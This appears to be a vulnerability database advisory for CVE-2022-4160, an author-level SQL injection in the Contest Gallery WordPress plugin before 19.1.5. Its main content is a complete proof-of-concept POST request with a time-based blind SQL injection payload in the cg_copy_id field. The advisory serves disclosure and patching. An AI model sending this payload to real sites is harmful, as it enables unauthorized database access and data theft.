Lucene search
Daniel KrohmerWPEX-ID:813DE343-4814-42B8-B8DF-1695320512CDHistoryDec 05, 2022 - 12:00 a.m.
Contest Gallery < 19.1.5 - Author+ SQL Injection
2022-12-0500:00:00
Daniel Krohmer
74
sql injection
post request
wordpress plugin
EPSS
0.001
Percentile
36.8%
The plugins do not escape the cg_copy_id POST parameter before concatenating it to an SQL query in cg-copy-comments.php and cg-copy-rating.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.
POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_gallery=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------57928068830176656773670049687
Content-Length: 1508
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7C6333e4fa1fc3f8961218830b63c9910e36a1507d9530ee857dda65208e7bd3bf; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7Cd34e5c9317c939593831376a9467f195ca7e97151d2f965acdbc84aeb291c5b7; wp-settings-time-5=1668467252; wp-settings-5=libraryContent%3Dbrowse
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_type"
cg_copy_type_all
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy"
true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_id"
1 AND (SELECT 7394 FROM (SELECT(SLEEP(2)))UrUZ)
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_start"
0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="option_id_next_gallery"
0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="id_to_copy"
1
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="edit_gallery_hidden_post"
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="copy_v7"
true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="page"
contest-gallery/index.php
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="action"
post_contest_gallery_action_ajax
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cgBackendHash"
e12e8782da8ac6c4f1725d81a9811524
-----------------------------57928068830176656773670049687--
Related
cve
cve
CVE-2022-4160
2022-12-26 13:15:13
nvd
nvd
CVE-2022-4160
2022-12-26 13:15:13
wpvulndb
wpvulndb
Contest Gallery < 19.1.5 - Author+ SQL Injection
2022-12-05 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-12-26 13:15:00
cvelist
cvelist
CVE-2022-4160 Contest Gallery < 19.1.5 - Author+ SQL Injection
2022-12-26 12:28:17
